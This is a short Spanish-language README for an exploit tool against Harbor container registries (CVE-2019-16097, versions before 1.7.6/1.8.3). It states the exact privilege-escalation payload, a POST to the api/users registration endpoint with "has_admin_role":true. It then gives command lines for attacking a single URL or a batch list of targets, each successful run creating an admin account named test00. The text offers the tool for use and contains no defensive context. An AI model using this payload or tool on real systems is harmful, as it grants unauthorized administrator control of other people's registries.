
harbor(<1.7.6/1.8.3) escalada de privilegios (CVE-2019-16097)
En 201909, Harbor expuso una vulnerabilidad que aprovechaba la función de registro para añadir administradores. Utilizando la interfaz de registro api/users y construyendo el parámetro post "has_admin_role":true, se puede añadir un administrador directamente.
Esta herramienta admite la detección de una sola URL o por lotes.
python2.7
pip install requests
Ayuda de uso: python harbor-give-me-admin.py -h

Detección de URL única: python harbor-give-me-admin.py -u "https://www.xxx.com/"
// Si la explotación tiene éxito, se añadirá la cuenta de administrador test00, ¡proceda con precaución!

Detección por lotes: python harbor-give-me-admin.py -f urls,txt
// Si la explotación tiene éxito, se añadirá la cuenta de administrador test00, ¡proceda con precaución!
gmail: [email protected]